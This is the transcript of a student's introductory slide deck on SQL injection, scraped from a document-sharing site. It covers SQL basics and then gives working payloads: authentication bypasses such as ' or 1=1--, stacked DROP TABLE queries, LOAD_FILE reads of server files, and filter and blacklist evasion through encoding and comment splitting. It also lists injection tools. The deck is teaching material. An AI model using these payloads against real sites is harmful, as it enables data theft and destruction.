sql – injections intro. prajen bhadel college of information technology & engeneering...
TRANSCRIPT
![Page 1: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/1.jpg)
SQL – Injections Intro.Prajen BhadelCollege of Information Technology & EngeneeringKathmandu tinkuneSixth semister
![Page 2: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/2.jpg)
2
SQL Injections
• SQL injection – code injection technique that exploits a security
vulnerability in application– occurs at the database layer of an application.
• SQL - Structured Query Language– Used to communicate with the database– ANSI-compliant SQL
![Page 3: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/3.jpg)
3
SQL Injections
• Authentication Bypass • Information Disclosure • Compromised Data Integrity • Compromised Availability of Data• Remote Command Execution
![Page 4: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/4.jpg)
4
Basic SQL
Select
Insert
Update
Delete
Union
• SQL statement breakdown
![Page 5: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/5.jpg)
5
SQL - Select
1. Select Information from a table
SELECT * FROM table where field=1
![Page 6: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/6.jpg)
6
SQL - Insert
1. Add new records to database
INSERT INTO tablename (id, name) values(10, “Greg”)
![Page 7: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/7.jpg)
7
SQL - Update
1. Updating existing records
UPDATE table set fieldA=123 WHERE somefield=2323
UPDATE table set fieldB=‘Greg’
![Page 8: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/8.jpg)
8
SQL - Delete
1. Delete records
DELETE FROM tableA where somefield=1221
DELETE FROM tableA
![Page 9: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/9.jpg)
9
SQL - Union
1. Combine two or more SELECT statements.
SELECT column_name(s) FROM table_name1UNION
SELECT column_name(s) FROM table_name2
![Page 10: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/10.jpg)
10
Terminators
• ; Semi colon ends current SQL query and starts a new one– SELECT * FROM users ; DROP TABLE users
• Stacked Query • -- Double dash ignores remaining query string
– Select * FROM users -- limit 10• Can be used in conjunction
– SELECT * FROM users WHERE id=''; DROP TABLE users; -- ' AND password=''
![Page 11: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/11.jpg)
11
Where Clause Pruning
• Powerful SQL technique – SQL trick for allowing a query to return either a full
set or a specified subset – 1=1 == TRUE
• SELECT * FROM users
WHERE (id = :id) OR (-1 = :id))
![Page 12: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/12.jpg)
12
SQL Injection Cause
• Executed via front end of the Web Application– GET URL parameter
• http://host.com/item.php?cat=1&id=11– Form POST fields
• <form action=“some.php” method=“post”> <input name='name'/> <input type='password' name='passwd'/></form>
![Page 13: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/13.jpg)
13
Techniques
• Normal SQL Injections– Errors & Exception– Unexpected output
• O'Reilly != O\'Reilly
• Blind SQL Injections– No errors– A lot of guesswork– Introduction of a delay as part of a malicious SQL statement
![Page 14: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/14.jpg)
14
SQL Injection Types
• Passive– Exposing database information
• Information retrieval
• Active– Altering database information
• Insertion • Deletion
![Page 15: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/15.jpg)
15
Testing for Vulnerability
• Manual– Time consuming
• Automated– SQL injection scanners only scan for known
vulnerabilities
• Google – Incorrect syntax near
![Page 16: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/16.jpg)
16
Toolbox
• SQLIer
• SQLbftools
• SQLibf
• SQLBrute
• BobCat
• SQLMap
• Absinthe
• SQL Injection Pen-testing Tool
• SQID
• SQLNinja
• FJ-Injector Framwork
• Automagic SQL Injector
• NGSS SQL Injector
![Page 17: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/17.jpg)
17
Identifying Vulnerable Site
Given unexpected input site behaves oddly– ‘ Single Quote– “ Double Quote– ‘1 Single Quote one– ‘a Single Quote a– ‘; Single Quote semicolon
• Input > Satan’s little minion– Nothing found for Satan\’s little minion– You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '\'
![Page 18: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/18.jpg)
18
Identifying Vulnerable Site
• ' or 1=1--" or 1=1--or 1=1--' or 'a'='a" or "a"="a') or ('a'='a
![Page 19: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/19.jpg)
19
Bypassing Filters
• Escaping entities– %26%23039 == ' == ‘ (single quote)
• %26 == &• %23 == #• 039 Entity number
– Select * FROM users WHERE username=‘secret%26%23039 OR %26%23039X%26%23039=%26%23039X
– Evaluated as > Select * FROM users WHERE username=‘secret ‘ OR ‘X’ = ‘X’• This evaluates to always true
• Char function– Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115)– Select * from users
• Concat & Hex functions– CONCAT('0x', HEX('/var/log/messages'))– 0x2F7661722F6C6F672F6D65737361676573
![Page 20: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/20.jpg)
20
Bypassing Filters
• Injecting AND 1=(SELECT LOAD_FILE('var/log/messages') )
– MySQL Error '\'var/log/messages\') ) limit 5 = 1 order by average desc limit 10' at line 1)
![Page 21: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/21.jpg)
21
Bypassing Filters
• 1=(SELECT LOAD_FILE('var/log/messages') )
– MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average desc limit 10' at line 1)
• Char
• Hex
– 1=(SELECT LOAD_FILE(0x2F7661722F6C6F672F6D65737361676573)
![Page 22: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/22.jpg)
22
Bypassing Blacklists
• What are Blacklists
• Blacklist (DELETE, EXEC)– DEL/**/ETE– /**/ D/**EVIL**/ELE/**/TE
![Page 23: SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister](https://reader035.vdocuments.us/reader035/viewer/2022081513/56649f395503460f94c563d1/html5/thumbnails/23.jpg)
23
Escape Characters
• %26%23039 OR %26%23039X%26%23039=%26%23039X– ‘ OR ‘X’ = ‘X’